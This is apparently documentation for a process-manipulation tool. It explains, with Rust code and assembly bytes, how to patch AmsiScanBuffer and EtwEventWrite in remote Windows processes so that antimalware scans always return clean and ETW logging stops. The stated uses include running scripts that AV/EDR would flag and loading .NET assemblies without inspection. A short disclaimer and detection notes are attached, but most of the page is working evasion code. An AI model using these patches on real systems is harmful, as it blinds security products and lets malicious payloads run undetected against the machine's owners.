D
DioProcess

AMSI & ETW Bypass

Ring 3

Patch AMSI and ETW in remote processes to bypass security monitoring and allow unrestricted script/payload execution.

Security Research Only

These techniques are for authorized security research only. Bypassing security mechanisms without authorization may be illegal.

AMSI Hooking

The Antimalware Scan Interface (AMSI) is used by Windows Defender and third-party security products to scan scripts and payloads at runtime. DioProcess can patch AmsiScanBuffer in a remote process to make all scans return clean.

AMSI Hook Algorithm

crates/misc/src/amsi.rs
pub fn hook_amsi(pid: u32) -> Result<(), MiscError> {
    // 1. Open target process with VM permissions
    let handle = OpenProcess(
        PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
        false, pid
    )?;
    
    // 2. Load amsi.dll locally with DONT_RESOLVE_DLL_REFERENCES
    //    (Same base address in target due to ASLR for system DLLs)
    let amsi = LoadLibraryExW("amsi.dll", DONT_RESOLVE_DLL_REFERENCES);
    
    // 3. Get AmsiScanBuffer address
    let func_addr = GetProcAddress(amsi, "AmsiScanBuffer");
    
    // 4. Verify code cave before function contains INT3 padding (0xCC)
    //    This is safe space for our hook shellcode
    
    // 5. Write 13-byte hook shellcode to code cave + prolog
    let shellcode = [
        0x31, 0xC0,                         // xor eax, eax (S_OK = 0)
        0x4C, 0x8B, 0x5C, 0x24, 0x30,       // mov r11, [rsp+0x30] (6th param = AMSI_RESULT*)
        0x45, 0x89, 0x03,                   // mov [r11], r8d (*result = AMSI_RESULT_CLEAN)
        0xC3,                               // ret
        // At AmsiScanBuffer entry point:
        0xEB, 0xF3,                         // jmp short -13 (jump to shellcode)
    ];
    
    // 6. WriteProcessMemory to patch the function
    WriteProcessMemory(handle, func_addr - 11, &shellcode, 13)?;
    
    // 7. Flush instruction cache
    FlushInstructionCache(handle, func_addr - 11, 13)?;
    
    Ok(())
}

AMSI Hook Shellcode

The hook uses a code cave technique:

shellcode.asm
; Code cave (before AmsiScanBuffer entry)
xor eax, eax              ; Return S_OK (0)
mov r11, [rsp+0x30]       ; Get AMSI_RESULT* (6th parameter)
mov [r11], r8d            ; *result = AMSI_RESULT_CLEAN (0)
ret                       ; Return to caller

; At AmsiScanBuffer entry point
jmp short -13             ; Jump up to shellcode

Target Processes

AMSI hooking works on any process that loads amsi.dll:

  • powershell.exe — Windows PowerShell
  • pwsh.exe — PowerShell Core
  • cscript.exe / wscript.exe — VBScript/JScript hosts
  • .NET applications — Any managed code host
  • msbuild.exe — MSBuild with inline tasks

ETW Patching

Event Tracing for Windows (ETW) is used by security products to monitor process activity. DioProcess can patch EtwEventWrite in ntdll.dll to disable all ETW logging for a process.

ETW Patch Algorithm

crates/misc/src/etw.rs
pub fn patch_etw(pid: u32) -> Result<(), MiscError> {
    // 1. Open target process
    let handle = OpenProcess(
        PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
        false, pid
    )?;
    
    // 2. Get EtwEventWrite address in ntdll.dll
    let ntdll = GetModuleHandleW("ntdll.dll");
    let func_addr = GetProcAddress(ntdll, "EtwEventWrite");
    
    // 3. Write 4-byte patch: xor rax, rax; ret
    let patch = [
        0x48, 0x31, 0xC0,  // xor rax, rax (return STATUS_SUCCESS)
        0xC3,              // ret
    ];
    
    // 4. Make memory writable
    VirtualProtectEx(handle, func_addr, 4, PAGE_EXECUTE_READWRITE)?;
    
    // 5. Write patch
    WriteProcessMemory(handle, func_addr, &patch, 4)?;
    
    // 6. Restore memory protection
    VirtualProtectEx(handle, func_addr, 4, PAGE_EXECUTE_READ)?;
    
    Ok(())
}

ETW Patch Bytes

patch.asm
; Original EtwEventWrite prolog:
; mov r11, rsp
; sub rsp, ...

; Patched to:
xor rax, rax    ; 48 31 C0 - Return STATUS_SUCCESS (0)
ret             ; C3       - Return immediately

UI Access

Both features are accessible from the Process tab context menu:

  • AMSI Hook: Right-click process → Miscellaneous → AMSI Hook
  • ETW Patch: Right-click process → Miscellaneous → ETW Patch

Comparison

FeatureAMSI HookETW Patch
Target DLLamsi.dllntdll.dll
Target FunctionAmsiScanBufferEtwEventWrite
Patch Size13 bytes (code cave)4 bytes (inline)
EffectAll scans return cleanAll ETW events disabled
ScopePer-processPer-process

System-Wide ETW Bypass

For system-wide ETW Threat Intelligence (ETW-TI) bypass, see Kernel Driver > ETWTI Bypass, which disables the ETW-TI provider at the kernel level.

Use Cases

  • • Execute PowerShell scripts without AMSI scanning
  • • Load .NET assemblies without security inspection
  • • Run scripts that would otherwise be flagged by AV/EDR
  • • Security research and red team testing
  • • Analyze how security products detect these bypasses

Detection Notes

These patches can be detected by:

  • • Memory integrity checks comparing .text sections to disk
  • • Hook scanning (see Hook Detection)
  • • ETW-TI monitoring of memory writes to ntdll.dll
  • • Kernel callbacks monitoring write operations